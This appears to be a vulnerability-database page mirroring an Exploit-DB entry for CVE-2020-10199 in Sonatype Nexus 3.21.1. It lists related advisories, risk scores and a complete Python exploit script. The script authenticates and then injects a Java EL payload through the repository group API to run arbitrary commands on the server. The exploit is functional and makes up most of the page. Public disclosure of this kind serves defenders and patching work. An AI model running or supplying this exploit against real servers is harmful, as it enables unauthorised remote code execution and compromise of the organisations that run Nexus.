Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)

🗓️ 06 Jan 2021 00:00:00Reported by 1F98DType

exploitdb🔗 www.exploit-db.com👁 345 Views

Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated). Vulnerable to Java EL injection allowing low privilege user to execute code on the server

Reporter	Title	Published	Views	Family All 30
0day.today	Nexus Repository Manager 3.21.1-01 Remote Code Execution Exploit	16 Apr 202000:00	–	zdt
Gitee	Exploit for Expression Language Injection in Sonatype Nexus	27 May 202014:46	–	gitee
GithubExploit	Exploit for Expression Language Injection in Sonatype Nexus	7 Apr 202013:23	–	githubexploit
GithubExploit	Exploit for Expression Language Injection in Sonatype Nexus	16 Apr 202009:40	–	githubexploit
ATTACKERKB	CVE-2020-10199	1 Apr 202000:00	–	attackerkb
BDU FSTEC	The vulnerability of Sonatype Nexus Repository Manager, related to improper code generation management, allows a perpetrator to execute arbitrary code.	9 Dec 202100:00	–	bdu_fstec
Circl	CVE-2020-10199	16 Apr 202000:38	–	circl
CISA KEV Catalog	Sonatype Nexus Repository Remote Code Execution Vulnerability	3 Nov 202100:00	–	cisa_kev
CNVD	Sonatype Nexus Repository Manager Command Execution Vulnerability (CNVD-2020-28477)	2 Apr 202000:00	–	cnvd
Check Point Advisories	Sonatype Nexus Repository Manager Remote Code Execution (CVE-2020-10199)	24 May 202000:00	–	checkpoint_advisories

# Exploit Title: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
# Exploit Author: 1F98D
# Original Author: Alvaro Muñoz
# Date: 27 May 2020
# Vendor Hompage: https://www.sonatype.com/
# CVE: CVE-2020-10199
# Tested on: Windows 10 x64
# References:
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
# 
# Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable
# to Java EL injection which allows a low privilege user to remotely
# execute code on the target server.
#
#!/usr/bin/python3

import sys
import base64
import requests

URL='http://192.168.1.1:8081'
CMD='cmd.exe /c calc.exe'
USERNAME='admin'
PASSWORD='password'

s = requests.Session()
print('Logging in')
body = {
    'username': base64.b64encode(USERNAME.encode('utf-8')).decode('utf-8'),
    'password': base64.b64encode(PASSWORD.encode('utf-8')).decode('utf-8')
}
r = s.post(URL + '/service/rapture/session',data=body)
if r.status_code != 204:
    print('Login unsuccessful')
    print(r.status_code)
    sys.exit(1)
print('Logged in successfully')

body = {
    'name': 'internal',
    'online': True,
    'storage': {
        'blobStoreName': 'default',
        'strictContentTypeValidation': True
    },
    'group': {
        'memberNames': [
            '$\\A{\'\'.getClass().forName(\'java.lang.Runtime\').getMethods()[6].invoke(null).exec(\''+CMD+'\')}"'
        ]
    },
}
r = s.post(URL + '/service/rest/beta/repositories/go/group', json=body)
if 'java.lang.ProcessImpl' in r.text:
    print('Command executed')
    sys.exit(0)
else:
    print('Error executing command, the following was returned by Nexus')
    print(r.text)

06 Jan 2021 00:00Current

8.7High risk

Vulners AI Score8.7

CVSS 3.18.8

CVSS 29

EPSS0.99064

SSVC